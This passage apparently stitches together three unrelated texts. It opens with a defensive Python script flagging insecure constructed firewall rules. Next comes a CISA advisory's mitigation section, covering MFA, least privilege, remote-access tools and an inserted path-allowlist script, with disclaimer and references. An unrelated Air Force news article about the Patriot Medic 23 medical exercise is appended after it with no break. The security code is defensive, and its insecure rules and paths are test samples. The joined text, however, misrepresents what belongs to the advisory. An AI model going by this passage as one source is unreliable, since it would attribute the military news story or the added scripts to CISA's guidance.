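LAN = ipaddress.ip_network("10.10.0.0/16")
ANY = ("any", "*", "0.0.0.0/0")               # wildcard spellings seen in rule exports
INSECURE_PORTS = {21: "FTP", 80: "HTTP"}      # unsecured protocols named in the advisory

# Constructed rules (name, source, destination, destination port, action); not from a real device.
RULES: List[Tuple[str, str, str, str, str]] = [
    ("web-in",         "0.0.0.0/0",       "192.0.2.10/32", "443", "allow"),
    ("ftp-in",         "0.0.0.0/0",       "192.0.2.20/32", "21",  "allow"),
    ("ftp-partner",    "198.51.100.0/24", "192.0.2.20/32", "21",  "allow"),
    ("mgmt-all",       "0.0.0.0/0",       "*",             "*",   "allow"),
    ("dmz-to-lan",     "192.0.2.0/24",    "10.10.5.5/32",  "80",  "allow"),
    ("dmz-to-lan-tls", "192.0.2.0/24",    "10.10.5.5/32",  "443", "allow"),
    ("deny-all",       "0.0.0.0/0",       "*",             "*",   "deny"),
]

def zone(spec: str) -> str:
    """Classify an address spec as 'untrusted' (internet), 'dmz' or 'lan'."""
    if spec in ANY:
        return "untrusted"
    net = ipaddress.ip_network(spec, strict=False)
    if net.subnet_of(DMZ):
        return "dmz"
    if net.subnet_of(LAN):
        return "lan"
    return "untrusted"

def audit_rules(rules) -> List[Tuple[str, str]]:
    """Return (rule name, finding) pairs for allow rules that violate the DMZ guidance."""
    findings: List[Tuple[str, str]] = []
    for name, src, dst, port, action in rules:
        if action != "allow":
            continue
        # Wildcards in destination host or port are disallowed outright.
        if dst in ANY or port == "*":
            findings.append((name, "wildcard destination host or port; scope to required hosts/ports"))
            continue
        p = int(port)
        # FTP/HTTP must be restricted to specific source IP ranges, never 'any'.
        if p in INSECURE_PORTS and src in ANY:
            findings.append((name, f"{INSECURE_PORTS[p]} exposed to any source; restrict to specific IP ranges"))
        # Anything entering the trusted LAN from a less trusted zone must be HTTPS.
        if zone(dst) == "lan" and zone(src) != "lan" and p != 443:
            findings.append((name, "flow into trusted LAN is not HTTPS (443); require HTTPS with MFA"))
    return findings
```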

Manage Accounts, Permissions, and Workstations

APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:

  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
  • Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as users’ passwords expire [CPG 2.A, CPG 2.B, CPG 2.C].
  • Implement the principle of least privilege to decrease threat actors’ abilities to access key network resources.
  • Limit the ability of a local administrator account to log in from a local interactive session [CPG 2.E] (e.g., “Deny access to this computer from the network”) and prevent access via an RDP session.
  • Establish policy and procedure for the prompt removal of unnecessary or disabled accounts and groups that are no longer needed, especially privileged accounts. Implement and enforce use of Local Administrator Password Solution (LAPS).
  • Control and limit local administration, ensuring administrative users do not have access to other systems outside of the local machine and across the domain.
  • Create a change control process for all privilege escalations and role changes on user accounts. Enable alerts on privilege escalations and role changes, as well as log privileged user changes in the network environment and create alerts for abnormal events.
  • Create and deploy a secure system baseline image to all workstations. See Microsoft’s guidance on Using Security Baselines in Your Organization.
  • Implement policies to block workstation-to-workstation RDP connections [CPG 2.V] through a Group Policy Object on Windows, or by a similar mechanism. The RDP service should be disabled if it is unnecessary [M1042].

Secure Remote Access Software

Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:

  • Establish a software behavior baseline to detect anomalies in behavior [CPG 2.T, CPG 2.U].
  • Monitor for unauthorized use of remote access software using endpoint detection tools.

For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.

Other Best Practice Mitigation Recommendations

  • Use application allowlists on domain controllers, administrative hosts, and other sensitive systems. Following exploitation of the public-facing application (Zoho ManageEngine ServiceDesk Plus), APT actors were able to download and execute multiple files on the system, which were then utilized to enumerate the network and perform reconnaissance operations.
    • Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and SYSTEM32. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.
  • Audit scheduled tasks and validate all findings via a Group Policy Object (GPO) or endpoint detection and response (EDR) solution.
  • Follow Microsoft’s Best Practices for Securing Active Directory.
  • Review NSA’s Network Infrastructure Security Guide.
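As an added example (not from the advisory), the Python script below implements the directory-allowlist check described above for the safe-default locations PROGRAMFILES, PROGRAMFILES(X86) and SYSTEM32, resolving paths before comparing so that '..' traversal and prefix look-alikes such as "C:\Program FilesEvil" are not accepted. The allowlist paths and sample image paths are constructed for illustration.

```python
import ntpath
from typing import Dict, Iterable, List

# Constructed allowlist mirroring the advisory's safe defaults (PROGRAMFILES,
# PROGRAMFILES(X86), SYSTEM32); in practice take these from the host's environment.
ALLOWED_DIRS: List[str] = [
    r"C:\Program Files",
    r"C:\Program Files (x86)",
    r"C:\Windows\System32",
]

def _canon(path: str) -> str:
    """Canonical Windows form: collapse '.'/'..' components, lower-case, backslashes."""
    return ntpath.normcase(ntpath.normpath(path))

def is_allowed(exe_path: str, allowed_dirs: Iterable[str] = ALLOWED_DIRS) -> bool:
    """True only if the resolved path sits beneath an allowed directory.

    Comparing resolved, case-folded paths with a trailing separator defeats
    '..' traversal ('C:\\Program Files\\..\\Users\\x\\a.exe') and prefix
    look-alikes ('C:\\Program FilesEvil\\a.exe'), which a naive startswith()
    on the raw string would accept.
    """
    target = _canon(exe_path)
    for base in allowed_dirs:
        root = _canon(base).rstrip("\\") + "\\"
        if target.startswith(root):
            return True
    return False

def triage(paths: Iterable[str]) -> Dict[str, bool]:
    """Evaluate many process image paths at once, e.g. from process-creation telemetry."""
    return {p: is_allowed(p) for p in paths}

# Constructed sample of image paths as they might appear in process-creation events.
SAMPLE_PATHS = [
    r"C:\Program Files\Vendor\app.exe",
    r"c:\WINDOWS\system32\cmd.exe",
    "C:/Program Files (x86)/App/app.exe",
    r"C:\Program Files\..\Users\jdoe\tool.exe",
    r"C:\Program FilesEvil\x.exe",
    r"C:\Users\Public\tool.exe",
]

if __name__ == "__main__":
    for path, ok in triage(SAMPLE_PATHS).items():
        print("ALLOW " if ok else "BLOCK ", path)
```

The check is string-based: 8.3 short names, junctions and symlinks must be resolved on the host before the comparison, and user-writable subdirectories beneath an allowed root still need a separate exception review.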

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 3-13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.

REFERENCES

  1. Snort: Known Malicious User-Agent String – Mirai
  2. MITRE: Mimikatz
  3. MITRE: Ngrok
  4. AA22-320A: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester
  5. AA22-294A: #StopRansomware: Daixin Team
  6. AA23-075A: #StopRansomware: LockBit 3.0
  7. GitHub: Interactsh
  8. Microsoft: Quser
  9. Internet Engineering Task Force (IETF): RFC 9116

VERSION HISTORY

September 7, 2023: Initial version.

Airmen reflect on lessons learned at Patriot Medic 23

Source: United States Air Force

The 433rd Medical Group returned home after validating its readiness to deploy by participating in Patriot Medic 23. The training, part of a larger exercise called Global Medic, involved more than 7,100 Reserve, active duty and allied forces as well as coalition partners.

Seventy Reserve Airmen from the 433rd MDG spent 19 days undergoing rigorous and realistic training at Youngstown Air Reserve Station, Ohio and Fort McCoy, Wisconsin. On top of validating the Airmen’s readiness to deploy, the annual exercise served to enhance interoperability between units, medics, individual reservists and the joint force.

Patriot Medic 23 provided “Alamo Wing” reservists opportunities to sharpen their skills beyond what can typically be accomplished during monthly unit training activities.

“What I’m grateful for is that I’d never seen our people in the 433rd Aeromedical Staging Squadron come together before, they’d never had to before,” said Maj. Reginald Whittington, 433rd ASTS Bravo Flight commander. “I was very impressed with the junior Airmen, the senior leadership … I would go to war with these people … we have people in the unit that I would trust with my life.”

Participation in Patriot Medic led to learning moments for new Airmen and veterans alike. Airmen from the 433rd ASTS embedded with the 914th ASTS, based out of Niagara Falls ARS, New York, as part of their training at the exercise.

“It was the first time in my career that we embedded with another unit,” Whittington, who has served for more than 20 years, noted. “We literally came together with another ASTS who has the same challenges, the same successes, the same, or different, solutions to certain things, and we were able to maximize what works best.”

For several of the “Alamo Wing” reservists, this was only their first or second exercise with the unit.

“When I went in there, honestly I didn’t know what to expect,” said Senior Airman Luis Martinez, a 433rd ASTS medic. “My job here is as a medic so that’s my mentality, I’m going to go be a medic … but it turned out to be a lot more than that. I learned new roles and responsibilities. I learned how to be a leader and I learned also how to be a follower.”

The exercise not only tested the Reserve Airmen’s knowledge of their jobs and their physical capabilities, but also their mental resiliency. Many of the lessons were learned the hard way.

“We failed a lot, which was a good thing because you need to feel that pain and then you come up with better solutions next time,” said Senior Airman Lindsey Neubauer, 433rd ASTS medic.

Both Neubauer and Martinez received challenge coins for their performance at the exercise, a traditional way for military leaders to recognize the efforts of their troops.

Patriot Medic also allowed 433rd MDG senior leaders to evaluate and mentor their Airmen, while strengthening the bonds between the members of their teams.

“I’ve been in for 16 years … this is probably one of the most realistic ones,” Master Sgt. Julie Fuleky, 433rd Medical Squadron Bravo flight chief, pointed out. “As we went through it, you started to see the team come together … it was a very valuable exercise because, where we normally only see each other two days a month, we were working closely together for 19 days.”

Col. Michelle Van Sickle, 433rd MDG commander, served as the joint task force surgeon at Fort McCoy during the exercise. She observed after the exercise that many of the newer medics were able to fully understand their mission and the importance of training prior to deployment, while more seasoned medics expanded their knowledge about operating in a contested environment.

“They all came together to accomplish the mission, and all performed at, or above, the standard we expected,” Van Sickle said. “I am proud of them.”